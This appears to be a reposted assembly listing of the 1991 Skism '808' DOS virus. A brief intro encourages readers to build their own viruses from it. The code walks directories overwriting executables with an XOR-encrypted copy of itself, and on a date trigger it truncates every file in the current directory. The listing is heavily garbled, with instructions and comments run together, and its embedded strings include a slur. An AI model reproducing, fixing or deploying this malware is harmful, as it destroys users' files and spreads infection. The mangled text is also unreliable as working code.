The 808 Virus
Here Another Virus from Skism. It's a quick overwriting virus butyou can use the source code to write your owmby viruses.
-------------------------------------------------- ----------------------------
The Skism 808 Virus. Created 1991 by Smart Kids Into Sick Methods.
Filename EQU 30; Used to Find File NameFileAttr EQU 21; Used to Find File AttributeSfileDate EQU 24; Used to Find File DateTime EQU 22; Used to Find File Time
Code_start EQU 0100H; start of all.com filesvirus_size EQU 808; TR 808
Code Segment 'Code'Assume CS: Code, DS: Code, ES: Codeorg Code_Start
Main Proc Near
JMP Virus_Start
Encrypt_val db 00h
Virus_Start:
Call Encrypt; Encrypt / Decrypt Filejmp Virus; Go to Start of Code
ENCRYPT:
Push CXMOV BX, Offset Virus_code; Start Encryption At Data
XOR_LOOP:
mov ch, [bx]; read current bytexor ch, encrypt_val; get encryption keymov [bx], ch; switch bytesinc bx; move bx up a bytecmp bx, offset virus_code virus_size; are we done with the encryptionjle xor_loop; no keep? GoingPoP Cxret
Infectfile:
mov dx, code_start; where virus starts in memorymov bx, handle; load bx with handlepush bx; save handle stackcall encrypt on; encrypt filepop bx; get back bxmov cx, virus_size; number of bytes to writemov ah, 40h; write to fileint 21h ; push bxcall encrypt; fix up the messpop bxret
Virus_code:
Wildcards db "*", 0; search for directory argumentfilespec db "* .exe", 0; search for exe file argumentfilespec2 db "*. *", 0RootDir DB "/", 0; Argument for root DirectoryDiData DB 43 DUP (? ); holds directory DTAfiledata db 43 dup ();? holds files DTAdiskdtaseg dw;? holds disk dta segmentdiskdtaofs dw;? holds disk dta offsettempofs dw;? holds offsettempseg dw;? holds segmentdrivecode db;? holds drive codecurrentdir db 64 dup (? ); save current directory into thishandle dw; holds file handleorig_time dw; holds file timeorig_date dw; holds file dateorig_attr dw; holds file attridbuffer dw 2 dup (); holds virus idvirus?????:
MOV AX, 3000H; Get Dos Versionint 21h; CMP Al, 02H; IS IT AT Least 2.00? JB Bus1; Won't Infect Less Than 2.00mov AH, 2CH; Get TimeInt 21h; MOV Encrypt_Val, DL; Save M_Seconds To Encrypt Val So; Theres 100 Mutations PossIBLESETDTA:
MOV DX, OFFSET DIRDATA; Offset of Where to Hold New DTAMOV AH, 1AH; SET DTA Addressint 21h
Newdir:
mov ah, 19h; get drive codeint 21h; mov dl, al; save drivecodeinc dl; add one to dl, because functions differmov ah, 47h; get current directorymov si, offset currentdir; buffer to save directory inint 21h;
Mov DX, Offset Rootdir; Move Dx To Change to Root Directorymov AH, 3BH; Change Directory To Rootint 21h;
Scandirs:
MOV CX, 13H; Include Hidden / Ro DirectorySmov DX, Offset Wildcards; Look for '*' MOV AH, 4EH; Find First Fileint 21h; CMP AX, 12H; NO FIRST FILE? JNE DIRLOOP; No Dirs Found? bail out
Bus1:
JMP bus
Dirloop:
MOV AH, 4FH; Find Next Fileint 21h; CMP AX, 12HJE BUS; No More Dirs Found, Roll Out
Chdir:
MOV DX, OFFSET DIRDATA FileName; Point DX TO FCB - Filenamemov AH, 3BH; Change Directoryint 21h
mov ah, 2fh; get current dta addressint 21h; mov [diskdtaseg], es; save old segmentmov [diskdtaofs], bx; save old offsetmov dx, offset filedata; offset of where to hold new dtamov ah, 1ah; set dta addressint 21h Scandir:
MOV CX, 07H; FIND ANY AttributeMov DX, Offset Filespec; Point Dx to "* .com", 0mov AH, 4EH; Find First File Functionint 21h; CMP AX, 12H; WAS File Found? JNE Transform
NEXTEXE:
MOV AH, 4FH; Find Next Fileint 21h; CMP AX, 12H; None Foundjne Transform; Found See What We Can DO
mov dx, offset rootdir; move dx to change to root directorymov ah, 3bh; change directory to rootint 21h; mov ah, 1ah; set dta addressmov ds, [diskdtaseg]; restore old segmentmov dx, [diskdtaofs]; restore old offsetint 21h JMP Dirloop
BUS:
JMP rollout
TRANSFORM:
MOV AH, 2FH; Temporally Store DTAINT 21H; MOV [Tempseg], ES; Save Old Segmentmov [Tempofs], BX; Save Old OffsetMov DX, Offset FileData FileName
MOV BX, Offset FileData; Save File ... MOV AX, [BX] FileDate; Datemov Orig_Date, Ax; Mov AX, [BX] FileTime; Timemov ORIG_TIME, AX; Andmov AX, [BX] FileAttr; MOV AX , 4300hint 21hmov orig_attr, cxmov ax, 4301h; change attributesxor cx, cx; clear attributesint 21h; mov ax, 3d00h; open file - readint 21h; jc fixup; error - find another filemov handle, ax; save handlemov ah, 3fh; read From Filemov BX, Handle; Move Handle to Bxmov CX, 02H; Read 2 Bytesmov DX, Offset IDBuffer; Save to Bufferint 21h;
MOV AH, 3EH; Close File for NOWMOV BX, HANDLE; LOAD BX with HANDLEINT 21H;
MOV BX, IDBuffer; Fill Bx with ID StringCMP BX, 02EBH; Infected? JNE DOIT; Same - Find Another File
FIXUP: MOV AH, 1AH; Set DTA Addressmov DS, [Tempseg]; Restore Old Segmentmov DX, [Tempofs]; Restore Old Offsetint 21h; JMP NEXTEXE
DOIT:
MOV DX, OFFSET FileData FileNamemov AX, 3D02H; Open File Read / Write Accessint 21h; Mov Handle, Ax; Save HandleCall InfectFile
; MOV AX, 3EH; Close File; INT 21h
ROLLOUT:
MOV AX, 5701H; Restore Originalmov BX, Handle; MOV CX, Orig_Time; Time Andmov DX, Orig_Date; Dateint 21h
mov ax, 4301h; restore original attributesmov cx, orig_attrmov dx, offset filedata filenameint 21h; mov bx, handle; mov ax, 3eh; close file; int 21hmov ah, 3bh; try to fix thismov dx, offset rootdir; for speedint 21h AH, 3BH; Change DirectoryMov DX, Offset Currentdir; Back to Originalint 21h; MOV AH, 2AH; Check System Dateint 21h; CMP CX, 1991; Is IT at Least 1991? JB Audi; NO? Don't do it Nowcmp DL, 25; IS IT THE 25th? JB Audi; Not Yet? Quitcmp Al, 5; Is Friday? JNE AUDI; NO? Quitmov DX, Offset Dirdata; Offset of Where To Hold New DTAMOV AH, 1AH; SET DTA Addressint 21h; MOV AH, 4EH; Find First Filemov CX, 7H; MOV DX, OFFSET FILESPEC2; Offset *. *
LOOPS:
INT 21H; JC AUDI; Error? Then Quitmov AX, 4301H; Find All Normal FileSxor CX, CX; INT 21H; MOV DX, OFFSET DIRDATA FILENAMEMOV AH, 3CH; Fuck Up All Files in Current Dirint 21h; JC AUDI; ERROR? Quitmov AH, 4FH; Find next filejmp loops;
AUDI:
MOV AX, 4C00H; End Programint 21h;
The below is just text to pie out the virus size to 808 bytes. Don't; Just Change The text and claim what this is your credree.
Words_ DB "SKISM RYTHEM Stack Virus-808. Smart Kids Into Sick Methods", 0Words2 DB "DONT ALTER This Code Into Your Own Strain, Faggit.", 0Words3 DB "HR / SSS NYCITY, this is The Fifth of Many, Many More .... ", 0Words4 DB" You Sissys ..... ", 0
Main Endpcode endsend main
